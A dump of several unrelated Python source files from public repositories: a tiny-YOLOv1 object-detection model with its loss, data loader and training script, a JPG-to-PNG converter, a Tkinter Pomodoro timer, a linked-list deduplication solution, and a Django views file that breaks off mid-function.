            {'x': 0, 'y': half_h, 'i': self.to_image(bottom_left)},
            {'x': half_w, 'y': half_h, 'i': self.to_image(bottom_right)},
        ]
| TheColorRed/image-editor | image-processor/Source/utils/image.py | image.py | py | 3,424 | python | en | code | 0 | github-code | 13 |
13944276872 |
################# model_tiny.py
from tensorflow.keras.layers import Conv2D, MaxPooling2D, \
Flatten, Dense, Reshape, LeakyReLU, BatchNormalization
# from tensorflow.keras.layers.normalization import
from tensorflow.keras.regularizers import l2
# from tensorflow.keras.engine.topology import Layer
from tensorflow.keras.layers import Layer
import tensorflow.keras.backend as K
class Yolo_Reshape(Layer):
    """Keras layer that reshapes the flat dense head into the YOLOv1
    S x S x (C + B + 4B) output tensor, applying softmax to the class
    scores and sigmoid to the confidences and box coordinates.
    """
    def __init__(self, target_shape, **kwargs):
        super(Yolo_Reshape, self).__init__(**kwargs)
        self.target_shape = tuple(target_shape)
    def compute_output_shape(self, input_shape):
        # Batch dimension is preserved; the rest becomes target_shape.
        return (input_shape[0],) + self.target_shape
    def call(self, inputs, **kwargs):
        S = [self.target_shape[0], self.target_shape[1]]  # grid size
        C = 20  # number of classes
        B = 2   # boxes per grid cell
        idx1 = S[0] * S[1] * C        # end of the class-score segment
        idx2 = idx1 + S[0] * S[1] * B # end of the confidence segment
        # class prediction
        class_probs = K.reshape(
            inputs[:, :idx1], (K.shape(inputs)[0],) + tuple([S[0], S[1], C]))
        class_probs = K.softmax(class_probs)
        # confidence
        confs = K.reshape(
            inputs[:, idx1:idx2], (K.shape(inputs)[0],) + tuple([S[0], S[1], B]))
        confs = K.sigmoid(confs)
        # boxes
        boxes = K.reshape(
            inputs[:, idx2:], (K.shape(inputs)[0],) + tuple([S[0], S[1], B * 4]))
        boxes = K.sigmoid(boxes)
        # return np.array([class_probs, confs, boxes])
        # Concatenate along the channel axis: S x S x (C + B + 4B).
        outputs = K.concatenate([class_probs, confs, boxes])
        return outputs
def model_tiny_yolov1(inputs):
    """Build the tiny-YOLOv1 network.

    Eight frozen 3x3 conv blocks (Conv + BatchNorm + LeakyReLU, matching
    the original layer names convolutional_0..7), the first six each
    followed by 2x2 max-pooling, then a trainable 1470-unit linear head
    reshaped into the 7x7x30 YOLO output tensor.
    """
    def conv_block(tensor, filters, index):
        # 3x3 conv without bias (BatchNorm supplies the shift), frozen.
        tensor = Conv2D(filters, (3, 3), padding='same',
                        name='convolutional_%d' % index, use_bias=False,
                        kernel_regularizer=l2(5e-4), trainable=False)(tensor)
        tensor = BatchNormalization(name='bnconvolutional_%d' % index,
                                    trainable=False)(tensor)
        return LeakyReLU(alpha=0.1)(tensor)

    x = inputs
    # Six pooled blocks progressively doubling the filter count.
    for index, filters in enumerate((16, 32, 64, 128, 256, 512)):
        x = conv_block(x, filters, index)
        x = MaxPooling2D((2, 2), strides=(2, 2), padding='same')(x)
    # Two final blocks without pooling.
    x = conv_block(x, 1024, 6)
    x = conv_block(x, 256, 7)

    x = Flatten()(x)
    x = Dense(1470, activation='linear', name='connected_0')(x)
    return Yolo_Reshape((7, 7, 30))(x)
################# yolo.py
import tensorflow.keras.backend as K
def xywh2minmax(xy, wh):
    """Convert center/size box coordinates to (min-corner, max-corner)."""
    half = wh / 2
    return xy - half, xy + half
def iou(pred_mins, pred_maxes, true_mins, true_maxes):
    """Elementwise intersection-over-union for boxes given as corner tensors."""
    overlap_mins = K.maximum(pred_mins, true_mins)
    overlap_maxes = K.minimum(pred_maxes, true_maxes)
    # Clamp at zero so disjoint boxes contribute no intersection area.
    overlap_wh = K.maximum(overlap_maxes - overlap_mins, 0.)
    overlap_areas = overlap_wh[..., 0] * overlap_wh[..., 1]
    pred_wh = pred_maxes - pred_mins
    true_wh = true_maxes - true_mins
    pred_areas = pred_wh[..., 0] * pred_wh[..., 1]
    true_areas = true_wh[..., 0] * true_wh[..., 1]
    union_areas = pred_areas + true_areas - overlap_areas
    return overlap_areas / union_areas
def yolo_head(feats):
    """Decode grid-relative predictions into absolute pixel coordinates.

    feats[..., :2] are cell-relative x/y offsets: adding the cell index and
    dividing by the grid size, then scaling by 448 (the input resolution
    used throughout this file), yields absolute box centers.
    feats[..., 2:4] are width/height as fractions of 448.
    """
    # Dynamic implementation of conv dims for fully convolutional model.
    conv_dims = K.shape(feats)[1:3] # assuming channels last
    # In YOLO the height index is the inner most iteration.
    conv_height_index = K.arange(0, stop=conv_dims[0])
    conv_width_index = K.arange(0, stop=conv_dims[1])
    conv_height_index = K.tile(conv_height_index, [conv_dims[1]])
    # TODO: Repeat_elements and tf.split doesn't support dynamic splits.
    # conv_width_index = K.repeat_elements(conv_width_index, conv_dims[1], axis=0)
    conv_width_index = K.tile(
        K.expand_dims(conv_width_index, 0), [conv_dims[0], 1])
    conv_width_index = K.flatten(K.transpose(conv_width_index))
    # Pair every (row, col) cell index and shape to (1, H, W, 1, 2) so it
    # broadcasts against the per-box predictions.
    conv_index = K.transpose(K.stack([conv_height_index, conv_width_index]))
    conv_index = K.reshape(conv_index, [1, conv_dims[0], conv_dims[1], 1, 2])
    conv_index = K.cast(conv_index, K.dtype(feats))
    conv_dims = K.cast(K.reshape(conv_dims, [1, 1, 1, 1, 2]), K.dtype(feats))
    box_xy = (feats[..., :2] + conv_index) / conv_dims * 448
    box_wh = feats[..., 2:4] * 448
    return box_xy, box_wh
def yolo_loss(y_true, y_pred):
    """YOLOv1 composite loss: confidence + classification + localization.

    y_true: ? * 7 * 7 * 25 (20 class one-hots, 4 box values, 1 response flag).
    y_pred: ? * 7 * 7 * 30 (20 class scores, 2 confidences, 2 boxes * 4).
    Within each responsible cell, only the predictor with the best IoU is
    penalized for box/confidence errors; the 5x box weight and 0.5x
    no-object weight follow the coefficients used below.
    """
    label_class = y_true[..., :20]  # ? * 7 * 7 * 20
    label_box = y_true[..., 20:24]  # ? * 7 * 7 * 4
    response_mask = y_true[..., 24]  # ? * 7 * 7
    response_mask = K.expand_dims(response_mask)  # ? * 7 * 7 * 1
    predict_class = y_pred[..., :20]  # ? * 7 * 7 * 20
    predict_trust = y_pred[..., 20:22]  # ? * 7 * 7 * 2
    predict_box = y_pred[..., 22:]  # ? * 7 * 7 * 8
    _label_box = K.reshape(label_box, [-1, 7, 7, 1, 4])
    _predict_box = K.reshape(predict_box, [-1, 7, 7, 2, 4])
    # Decode to absolute coordinates, then to corner form for the IoU.
    label_xy, label_wh = yolo_head(_label_box)  # ? * 7 * 7 * 1 * 2, ? * 7 * 7 * 1 * 2
    label_xy = K.expand_dims(label_xy, 3)  # ? * 7 * 7 * 1 * 1 * 2
    label_wh = K.expand_dims(label_wh, 3)  # ? * 7 * 7 * 1 * 1 * 2
    label_xy_min, label_xy_max = xywh2minmax(label_xy, label_wh)  # ? * 7 * 7 * 1 * 1 * 2, ? * 7 * 7 * 1 * 1 * 2
    predict_xy, predict_wh = yolo_head(_predict_box)  # ? * 7 * 7 * 2 * 2, ? * 7 * 7 * 2 * 2
    predict_xy = K.expand_dims(predict_xy, 4)  # ? * 7 * 7 * 2 * 1 * 2
    predict_wh = K.expand_dims(predict_wh, 4)  # ? * 7 * 7 * 2 * 1 * 2
    predict_xy_min, predict_xy_max = xywh2minmax(predict_xy, predict_wh)  # ? * 7 * 7 * 2 * 1 * 2, ? * 7 * 7 * 2 * 1 * 2
    iou_scores = iou(predict_xy_min, predict_xy_max, label_xy_min, label_xy_max)  # ? * 7 * 7 * 2 * 1
    best_ious = K.max(iou_scores, axis=4)  # ? * 7 * 7 * 2
    best_box = K.max(best_ious, axis=3, keepdims=True)  # ? * 7 * 7 * 1
    # box_mask selects, per cell, the predictor whose IoU is the best.
    box_mask = K.cast(best_ious >= best_box, K.dtype(best_ious))  # ? * 7 * 7 * 2
    no_object_loss = 0.5 * (1 - box_mask * response_mask) * K.square(0 - predict_trust)
    object_loss = box_mask * response_mask * K.square(1 - predict_trust)
    confidence_loss = no_object_loss + object_loss
    confidence_loss = K.sum(confidence_loss)
    class_loss = response_mask * K.square(label_class - predict_class)
    class_loss = K.sum(class_loss)
    # Re-decode for the localization term.
    _label_box = K.reshape(label_box, [-1, 7, 7, 1, 4])
    _predict_box = K.reshape(predict_box, [-1, 7, 7, 2, 4])
    label_xy, label_wh = yolo_head(_label_box)  # ? * 7 * 7 * 1 * 2, ? * 7 * 7 * 1 * 2
    predict_xy, predict_wh = yolo_head(_predict_box)  # ? * 7 * 7 * 2 * 2, ? * 7 * 7 * 2 * 2
    box_mask = K.expand_dims(box_mask)
    response_mask = K.expand_dims(response_mask)
    # sqrt on w/h de-emphasizes errors on large boxes (YOLOv1 formulation).
    box_loss = 5 * box_mask * response_mask * K.square((label_xy - predict_xy) / 448)
    box_loss += 5 * box_mask * response_mask * K.square((K.sqrt(label_wh) - K.sqrt(predict_wh)) / 448)
    box_loss = K.sum(box_loss)
    loss = confidence_loss + class_loss + box_loss
    return loss
################ data_sequence.py
from tensorflow.keras.utils import Sequence
import math
import cv2 as cv
import numpy as np
import os
class SequenceData(Sequence):
    """Keras Sequence yielding (image batch, YOLOv1 label batch) pairs.

    Each dataset line is "<image_path> xmin,ymin,xmax,ymax,cls ...";
    labels are rasterized into a 7x7x25 grid (20 class one-hots,
    normalized box, response flag).
    """
    def __init__(self, model, dir, target_size, batch_size, shuffle=True):
        self.model = model
        self.datasets = []
        # BUG FIX: the original compared strings with `is`, which only
        # worked by accident of CPython string interning; `==` is correct.
        if self.model == 'train':
            with open(os.path.join(dir, '2007_train.txt'), 'r') as f:
                self.datasets = self.datasets + f.readlines()
        elif self.model == 'val':
            with open(os.path.join(dir, '2007_val.txt'), 'r') as f:
                self.datasets = self.datasets + f.readlines()
        self.image_size = target_size[0:2]
        self.batch_size = batch_size
        self.indexes = np.arange(len(self.datasets))
        self.shuffle = shuffle
    def __len__(self):
        # Number of batches per epoch.
        num_imgs = len(self.datasets)
        return math.ceil(num_imgs / float(self.batch_size))
    def __getitem__(self, idx):
        # Select the dataset lines for batch `idx`...
        batch_indexs = self.indexes[idx * self.batch_size:(idx + 1) * self.batch_size]
        batch = [self.datasets[k] for k in batch_indexs]
        # ...and materialize their images and labels.
        X, y = self.data_generation(batch)
        return X, y
    def on_epoch_end(self):
        # Reshuffle the sample order between epochs when requested.
        if self.shuffle:
            np.random.shuffle(self.indexes)
    def read(self, dataset):
        """Load one sample: resized, normalized image + 7x7x25 label grid."""
        dataset = dataset.strip().split()
        image_path = dataset[0]
        label = dataset[1:]
        image = cv.imread(image_path)
        image = cv.cvtColor(image, cv.COLOR_BGR2RGB)  # OpenCV loads BGR
        image_h, image_w = image.shape[0:2]
        image = cv.resize(image, self.image_size)
        image = image / 255.
        label_matrix = np.zeros([7, 7, 25])
        for l in label:
            l = l.split(',')
            # BUG FIX: np.int was removed in NumPy 1.24; use the builtin int.
            l = np.array(l, dtype=int)
            xmin = l[0]
            ymin = l[1]
            xmax = l[2]
            ymax = l[3]
            cls = l[4]
            # Box center and size, normalized to [0, 1].
            x = (xmin + xmax) / 2 / image_w
            y = (ymin + ymax) / 2 / image_h
            w = (xmax - xmin) / image_w
            h = (ymax - ymin) / image_h
            # Grid cell owning the box center, plus in-cell offsets.
            loc = [7 * x, 7 * y]
            loc_i = int(loc[1])
            loc_j = int(loc[0])
            y = loc[1] - loc_i
            x = loc[0] - loc_j
            # Keep only the first object per cell.
            if label_matrix[loc_i, loc_j, 24] == 0:
                label_matrix[loc_i, loc_j, cls] = 1
                label_matrix[loc_i, loc_j, 20:24] = [x, y, w, h]
                label_matrix[loc_i, loc_j, 24] = 1  # response
        return image, label_matrix
    def data_generation(self, batch_datasets):
        """Stack the images and labels for one batch into arrays."""
        images = []
        labels = []
        for dataset in batch_datasets:
            image, label = self.read(dataset)
            images.append(image)
            labels.append(label)
        X = np.array(images)
        y = np.array(labels)
        return X, y
#################### train.py
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, TensorBoard
import os
from models.model_tiny_yolov1 import model_tiny_yolov1
from data_sequence import SequenceData
from yolo.yolo import yolo_loss
from callback import callback
import tensorflow as tf
epochs = 10  # NOTE: _main() currently hard-codes epochs=30 in fit_generator
batch_size = 32  # samples per gradient update
datasets_path = ''  # directory holding 2007_train.txt / 2007_val.txt
def _main():
    """Build tiny-YOLOv1, restore weights, train with checkpointing.

    BUG FIX: the original started with `epochs = epochs` and
    `batch_size = batch_size`, and later did
    `datasets_path = os.path.expanduser(datasets_path)`.  Each of these
    assignments makes the name local before it is read, so calling _main()
    raised UnboundLocalError immediately.  The module-level constants are
    now read without rebinding them.
    """
    input_shape = (448, 448, 3)
    inputs = Input(input_shape)
    yolo_outputs = model_tiny_yolov1(inputs)
    model = Model(inputs=inputs, outputs=yolo_outputs)
    print(model.summary())
    tf.keras.utils.plot_model(model,
                              to_file='yolov1.png',
                              show_shapes=True,
                              show_layer_names=True)
    model.compile(loss=yolo_loss, optimizer='adam')
    save_dir = 'checkpoints'
    weights_path = os.path.join(save_dir, 'weights.hdf5')
    # Keep only the best weights as judged by validation loss.
    checkpoint = ModelCheckpoint(weights_path, monitor='val_loss',
                                 save_weights_only=True, save_best_only=True)
    if not os.path.isdir(save_dir):
        os.makedirs(save_dir)
    # Resume a previous run when possible, otherwise start from the
    # pretrained backbone weights.
    if os.path.exists('checkpoints/weights.hdf5'):
        model.load_weights('checkpoints/weights.hdf5', by_name=True)
    else:
        model.load_weights('tiny-yolov1.hdf5', by_name=True)
        print('no train history')
    early_stopping = EarlyStopping(
        monitor='val_loss', min_delta=0, patience=15, verbose=1, mode='auto')
    expanded_path = os.path.expanduser(datasets_path)
    train_generator = SequenceData(
        'train', expanded_path, input_shape, batch_size)
    validation_generator = SequenceData(
        'val', expanded_path, input_shape, batch_size)
    # NOTE: fit_generator is deprecated in newer tf.keras in favor of fit().
    model.fit_generator(
        train_generator,
        steps_per_epoch=len(train_generator),
        epochs=30,
        validation_data=validation_generator,
        validation_steps=len(validation_generator),
        # use_multiprocessing=True,
        workers=4,
        callbacks=[checkpoint, early_stopping]
    )
    model.save_weights('my-tiny-yolov1.hdf5')
# Script entry point: build, train, and checkpoint the tiny-YOLOv1 model.
if __name__ == '__main__':
    _main()
| G0rav/yolov1 | yolov1_complete.py | yolov1_complete.py | py | 13,946 | python | en | code | 0 | github-code | 13 |
11527812303 | #install pillow package, pip3 install pillow
import sys
import os

from PIL import Image

# Usage: python jpg.py <input_dir> <output_dir>
# Converts every .jpg in input_dir to a .png in output_dir.
input_dir = sys.argv[1]
output_dir = sys.argv[2]
print(input_dir)

# BUG FIX: the original tested os.path.exists(output) but then created the
# literal directory 'output', ignoring the argument.  exist_ok also avoids
# the check-then-create race.
os.makedirs(output_dir, exist_ok=True)

# Open and save files.  os.path.join makes trailing slashes on the
# arguments optional (the original concatenated strings directly).
for item in os.listdir(input_dir):
    stem = os.path.splitext(item)[0]
    image = Image.open(os.path.join(input_dir, stem + '.jpg'))
    image.save(os.path.join(output_dir, stem + '.png'), 'png')
    print(image)
| raghav914/Image-Converter | jpg.py | jpg.py | py | 410 | python | en | code | 0 | github-code | 13 |
25951363465 |
from tkinter import *
import time
import math
# ---------------------------- CONSTANTS ------------------------------- #
PINK = "#e2979c"
RED = "#e7305b"
GREEN = "#9bdeac"
YELLOW = "#f7f5dd"
FONT_NAME = "Courier"
WORK_MIN = 25  # length of a work session, in minutes
SHORT_BREAK_MIN = 5  # length of a short break, in minutes
LONG_BREAK_MIN = 20  # length of the long break, in minutes
# Mutable module state: completed-phase counter and pending `after` callback id.
reps = 0
timer = None
# ---------------------------- TIMER RESET ------------------------------- #
def reset_timer():
    """Stop the countdown and restore the UI to its initial state."""
    window.after_cancel(timer)  # cancel the pending one-second tick
    check_mark.config(text="")  # clear accumulated session check marks
    title_label.config(text="Timer", fg=GREEN)
    canvas_5.itemconfig(timer_text, text="00:00")
    global reps
    reps = 0  # next Start begins a fresh cycle
# ---------------------------- TIMER MECHANISM ------------------------------- #
def start_timer():
    """Advance to the next pomodoro phase and start its countdown.

    Cycle: work / short break alternating, with a long break after every
    4th work session (i.e. every 8th rep).
    """
    global reps
    reps += 1
    work_sec = WORK_MIN * 60
    short_break_sec = SHORT_BREAK_MIN * 60
    long_break_sec = LONG_BREAK_MIN * 60
    # BUG FIX: the original tested `reps == 8`, so only the FIRST long
    # break ever fired; `reps % 8 == 0` repeats it every cycle.
    if reps % 8 == 0:
        count_down (long_break_sec)
        #long break
        title_label.config(text="Break", fg=RED)
    elif reps % 2 == 0:
        count_down(short_break_sec)
        #short break
        title_label.config(text="Break", fg=PINK)
    else:
        count_down(work_sec)
        #working
        title_label.config(text="Work", fg=GREEN)
# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #
def count_down(count):
    """Tick the on-screen timer once per second; when it reaches zero,
    roll into the next phase and refresh the check marks (one per
    completed work session)."""
    global reps, timer
    # Format as M:SS (seconds always two digits, minutes unpadded).
    minutes, seconds = divmod(count, 60)
    canvas_5.itemconfig(timer_text, text=f"{minutes}:{seconds:02d}")
    if count > 0:
        # Schedule the next tick and remember its id so Reset can cancel it.
        timer = window.after(1000, count_down, count - 1)
    else:
        start_timer()
        if reps % 2 == 0:
            check_mark.config(text="✔" * (reps // 2))
# ---------------------------- UI SETUP ------------------------------- #
# configuring the window
window = Tk()
window.title("Pomodoro")
window.config(padx=0, pady=0, bg=YELLOW)
# Row 0: title label between two background canvases.
canvas_1 = Canvas(width=100, height=100, bg=YELLOW, highlightthickness=0)
canvas_1.grid(column=0, row=0)
title_label = Label(text="Timer", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 50))
title_label.grid(column=1, row=0)
canvas_3 = Canvas(width=100, height=100, bg=YELLOW, highlightthickness=0)
canvas_3.grid(column=2, row=0)
canvas_4 = Canvas(width=100, height=224, bg=YELLOW, highlightthickness=0)
canvas_4.grid(column=0, row=1)
#adding an image onto the canvas
canvas_5 = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)
tomato_img = PhotoImage(file="day28/tomato.png")
canvas_5.create_image(100, 112, image=tomato_img)
# timer_text is the canvas item count_down() updates every second.
timer_text = canvas_5.create_text(100, 130, text="00:00", fill="white", font=(FONT_NAME, 35, "bold"))
canvas_5.grid(column=1, row=1)
canvas_6 = Canvas(width=100, height=224, bg=YELLOW, highlightthickness=0)
canvas_6.grid(column=2, row=1)
# Row 2: Start and Reset buttons (canvases fill the remaining cells).
canvas_7 = Canvas(width=100, height=10, bg=YELLOW, highlightthickness=0)
canvas_7.grid(column=0, row=2)
start_button = Button(text="Start", command=start_timer)
start_button.grid(column=0, row=2)
canvas_8 = Canvas(width=200, height=20, bg=YELLOW, highlightthickness=0)
canvas_8.grid(column=1, row=2)
canvas_9 = Canvas(width=100, height=20, bg=YELLOW, highlightthickness=0)
canvas_9.grid(column=2, row=2)
reset_button = Button(text="Reset", command=reset_timer)
reset_button.grid(column=2, row=2)
# Row 3: check-mark label updated by count_down().
canvas_10 = Canvas(width=100, height=20, bg=YELLOW, highlightthickness=0)
canvas_10.grid(column=0, row=3)
canvas_11 = Canvas(width=200, height=20, bg=YELLOW, highlightthickness=0)
canvas_11.grid(column=1, row=3)
check_mark = Label(fg=GREEN, bg=YELLOW)
check_mark.grid(column=1, row=3)
canvas_12 = Canvas(width=100, height=20, bg=YELLOW, highlightthickness=0)
canvas_12.grid(column=2, row=3)
# Row 4: bottom padding row.
canvas_13 = Canvas(width=100, height=30, bg=YELLOW, highlightthickness=0)
canvas_13.grid(column=0, row=4)
canvas_14 = Canvas(width=200, height=30, bg=YELLOW, highlightthickness=0)
canvas_14.grid(column=1, row=4)
canvas_15 = Canvas(width=100, height=30, bg=YELLOW, highlightthickness=0)
canvas_15.grid(column=2, row=4)
window.mainloop() | ckzard/100days | day28/main.py | main.py | py | 4,482 | python | en | code | 0 | github-code | 13 |
29696279244 | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:
s = set()
deleted = set()
cur = head
while (cur is not None):
if cur.val in s:
deleted.add(cur.val)
else:
s.add(cur.val)
cur = cur.next
head = ListNode(val=None, next=head)
cur_slow = head
cur_fast = head
while cur_fast.next is not None:
cur_fast = cur_fast.next
while cur_fast.val in deleted:
cur_fast = cur_fast.next
if cur_fast is None:
break
if cur_fast is None:
cur_slow.next = None
break
cur_slow.next = cur_fast
cur_slow = cur_slow.next
return head.next | xincheng-cao/loser_fruit | hash/82. Remove Duplicates from Sorted List II.py | 82. Remove Duplicates from Sorted List II.py | py | 992 | python | en | code | 0 | github-code | 13 |
73658168658 | from pwn import *
# Launch the target binary with its bundled libc forced in via LD_PRELOAD.
p = process("./faker", env={"LD_PRELOAD": "./libc.so.6"})
elf = ELF("faker")
libc = ELF("libc.so.6")
def new(size):
    """Menu option 1: allocate a chunk of `size`; return the reported index."""
    p.sendlineafter("> ", "1")
    p.sendlineafter(":\n", str(size))
    return int(p.recvregex("at index (\d+)")[0])
def edit(index, data):
    """Menu option 2: overwrite the chunk at `index` with `data`."""
    p.sendlineafter("> ", "2")
    p.sendlineafter(":\n", str(index))
    p.sendafter(":\n", data)
def delete(index):
p.sendlineafter("> ", "3")
p.sendlineafter(":\n", str(index))
p.sendlineafter('size:\n','5')
p.sendafter('name:\n','flag\x00')
'''
Chunk 0 - 6, count = 7: size 0x70
tcache is full
'''
for i in range(7):
new(0x68)
delete(0)
new(0x68) # chunk 0
new(0x68) # chunk 1
delete(0) # fastbin -> 0x71 -> 0
delete(1) # fastbin -> 0x71 -> 0
edit(1, p64(0x6020bd)) # chunk[1]->fd = 0x6020bd
new(0x68) # chunk 0
new(0x68) # chunk 1
payload = b'AAA'
payload += p64(0) * 2
payload += p32(0x68) * 8 # size -> int
payload += p32(1) * 3 + p32(0) * 5
payload += p64(elf.got['free']) # ptr[0]
payload += p64(0x6020e0) # ptr[1] = &page_size
'''
ptr[0] = fee@got
ptr[1] = &page_size
'''
edit(1, payload) # edit the page_table
edit(0, p64(elf.plt['printf'])) # ptr[0] -> free@got -> printf@plt
new(0x68) # chunk 2
edit(3, "%19$p\n") # FSB
delete(3) # free(chunk[3]) -> %19$p -> printf("%19$p")
libc.address = int(p.recvline().strip(), 16) - libc.symbols['__libc_start_main'] - 231
log.info(f"LIBC: {hex(libc.address)}")
payload = p32(0x68) * 8 # size > int
payload += p32(1) * 3 + p32(0) * 5 # flags -> int
payload += p64(elf.got["free"]) # ptr[0] = free@got
payload += p64(0x6020e0) # ptr[1] = page_size
payload += p64(0x602138) # *ptr
edit(1, payload)
new(0x70) # 3
new(0x70) # 4
delete(2) # free(chunk2) -> printf(&chunk2)
heap_base = u64(p.recv(4).ljust(8, b"\x00")) - 0x14b0
log.info(f"HEAP: {hex(heap_base)}")
syscall = libc.address + 0x00000000000d2975
pop_rsi = libc.address + 0x0000000000023e6a
pop_rax = libc.address + 0x00000000000439c8
pop_rdx = libc.address + 0x0000000000001b96
pop_rdi = libc.address + 0x000000000002155f
edit(0, p64(libc.symbols["setcontext"] + 0x35))
'''
Perform stack pivot and oRW
0x7f12c88450a5 <setcontext+53>: mov rsp,QWORD PTR [rdi+0xa0]
0x7f12c88450ac <setcontext+60>: mov rbx,QWORD PTR [rdi+0x80]
0x7f12c88450b3 <setcontext+67>: mov rbp,QWORD PTR [rdi+0x78]
0x7f12c88450b7 <setcontext+71>: mov r12,QWORD PTR [rdi+0x48]
0x7f12c88450bb <setcontext+75>: mov r13,QWORD PTR [rdi+0x50]
0x7f12c88450bf <setcontext+79>: mov r14,QWORD PTR [rdi+0x58]
0x7f12c88450c3 <setcontext+83>: mov r15,QWORD PTR [rdi+0x60]
0x7f12c88450c7 <setcontext+87>: mov rcx,QWORD PTR [rdi+0xa8]
0x7f12c88450ce <setcontext+94>: push rcx
0x7f12c88450cf <setcontext+95>: mov rsi,QWORD PTR [rdi+0x70]
0x7f12c88450d3 <setcontext+99>: mov rdx,QWORD PTR [rdi+0x88]
0x7f12c88450da <setcontext+106>: mov rcx,QWORD PTR [rdi+0x98]
0x7f12c88450e1 <setcontext+113>: mov r8,QWORD PTR [rdi+0x28]
0x7f12c88450e5 <setcontext+117>: mov r9,QWORD PTR [rdi+0x30]
0x7f12c88450e9 <setcontext+121>: mov rdi,QWORD PTR [rdi+0x68]
0x7f12c88450ed <setcontext+125>: xor eax,eax
0x7f12c88450ef <setcontext+127>: ret
'''
payload = b''
payload += b'flag\x00\x00\x00\x00' + p64(0xffffffffffffff9c) # rdi + 0x60 --> r15, rdi
payload += p64(heap_base + 0x14b0) + p64(0) # rdi + 0x70 --> rsi, rbp
payload += p64(0) + p64(0) # rdi + 0x80 --> rbx, rdx
payload += p64(0) + p64(0) # rdi + 0x90 --> XXX, rcx
payload += p64(heap_base + 0x17d0 - 8) + p64(pop_rax) # rdi + 0xa0 --> rsp,
# Store the payload, one after another
edit(3, payload)
payload = p32(0xfff) * 8
payload += p32(1) * 5 + p32(0) * 3
payload += p64(elf.got["free"])
payload += p64(0x6020e0)
payload += p64(heap_base + 0x14b0 - 0x60) # otr[2]
edit(1, payload)
# openat(0, "flag", 0)
payload = p64(pop_rax)
payload += p64(257)
payload += p64(syscall)
payload += p64(pop_rax)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi)
payload += p64(heap_base)
payload += p64(pop_rdx)
payload += p64(0x40)
payload += p64(syscall)
payload += p64(pop_rax)
payload += p64(1)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi)
payload += p64(heap_base)
payload += p64(pop_rdx)
payload += p64(0x40)
payload += p64(syscall)
edit(4, payload)
delete(2) # Stack Pivot
p.interactive()
| D4mianWayne/PwnLand | CTFs/3kCTF2020/faker/faker.py | faker.py | py | 4,332 | python | en | code | 43 | github-code | 13 |
24346068490 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import os
import pandas as pd
# In[3]:
# file paths
IMGFOLDER = 'myprac/'
COLORMASKFOLDER = 'myprac/color_masks/'
BIMASKFOLDER = 'myprac/bi_coded_masks/'
CSVFILE = 'myprac/bbox.csv'
IMGOUT = 'myprac/imgs/'
FINALMASKOUT = 'myprac/masks/'
# In[4]:
# setup
# current works best for BnW images
THRESHOLD = 225
MAXVALUES = 128
# In[ ]:
# label names
LABEL1 = 'margin'
LABEL2 = 'text'
LABEL3 = 'image_capital'
LABEL4 = 'noise'
LABEL5 = 'background'
# In[ ]:
# bib ext
# https://www.tutorialspoint.com/how-to-apply-a-mask-on-the-matrix-in-matplotlib-imshow
# https://matplotlib.org/3.5.0/gallery/images_contours_and_fields/image_masked.html
# https://stackoverflow.com/questions/56766307/plotting-with-numpy-masked-arrays
# https://stackoverflow.com/questions/31877353/overlay-an-image-segmentation-with-numpy-and-matplotlib
# https://matplotlib.org/stable/gallery/images_contours_and_fields/image_masked.html
# https://matplotlib.org/3.4.3/tutorials/intermediate/artists.html?highlight=layer%20image
# https://www.blog.pythonlibrary.org/2021/02/23/drawing-shapes-on-images-with-python-and-pillow/
# https://note.nkmk.me/en/python-pillow-composite/
| thebabellibrarybot/prep_fasterRCNN_anno | mask_config.py | mask_config.py | py | 1,216 | python | en | code | 1 | github-code | 13 |
31374392804 | # Takes a long string formatted as a repetition of [sender] => [receiver] £[amount] [datetime]
# and converts it into a list of tuples in the format [(sender, receiver, amount, datetime), ...].
def read_ledger(s):
l = []
if len(s) < 29:
return l #less than the minimum amount of characters returns an empty list
for i in s.split("\n"):
l.append(i.split()) #loop through a list of entries and then append the split list of each
for v in range(len(l)):
l[v].remove("=>") #remove excess character
l[v][2] = int(l[v][2][1:]) #turn the amount part of the entry into an integer
return [tuple(x) for x in l] #list comprehension to turn each entry into a tuple
| JoFGD/ReadLedger | read_ledger.py | read_ledger.py | py | 710 | python | en | code | 0 | github-code | 13 |
15726670967 | def collatz(number):
if number%2 == 0:
result = number // 2
print(str(number) + ' // 2 = ' + str(result))
else:
result = 3 * number + 1
print('3 * ' + str(number) + ' + 1 = ' + str(result))
print('Please! Enter number: ')
collatz(int(input()))
| tmhung-nt/PythonPractise | Tien/Chapter3/The_Collatz_Sequence.py | The_Collatz_Sequence.py | py | 262 | python | en | code | 0 | github-code | 13 |
26811824623 | import random
import turtle
from turtle import Turtle, Screen
tim = Turtle()
turtle.colormode(255)
def random_color():
r = random.randint(0, 255)
g = random.randint(0, 255)
b = random.randint(0, 255)
colors = (r, g, b)
return colors
tim.speed("fast")
tim.pensize(10)
directions = [0, 90, 180, 270]
for _ in range(80):
tim.color(random_color())
tim.forward(30)
# setheading - set the turtle according to the angle
tim.setheading(random.choice(directions))
screen = Screen()
screen.exitonclick()
| nilayhangarge/100-Days-of-Code-Challenge | Project/Day-18 Turtle Graphics/Day-18 Turtle Challenges/Version 18.4/main.py | main.py | py | 537 | python | en | code | 0 | github-code | 13 |
33301433385 | from django.shortcuts import render
from django.http import HttpResponse
from app.models import *
# Create your views here.
def form(request):
if request.method=='POST':
username=request.POST['un']
password=request.POST['pw']
print(username)
print(password)
return HttpResponse('data is inserted')
return render (request,'form.html')
def data(request):
if request.method=='POST':
topic=request.POST['topic']
TO=Topic.objects.get_or_create(topic_name=topic)[0]
TO.save()
return HttpResponse('data is inserted')
return render(request,'data.html')
def Webpage(request):
LTO=Topic.objects.all()
d={'LTO':LTO}
if request.method=='POST':
topic=request.POST['topic']
name=request.POST['name']
url=request.POST['Url']
TO=Topic.objects.get(topic_name=topic)
WO=WebPage.objects.get_or_create(topic_name=TO,name=name,url=url)[0]
WO.save()
return HttpResponse('data is inserted')
return render(request,'Webpage.html',d)
def AcessRecords(request):
if request.method=='POST':
n=request.POST['name']
date=request.POST['date']
author=request.POST['author']
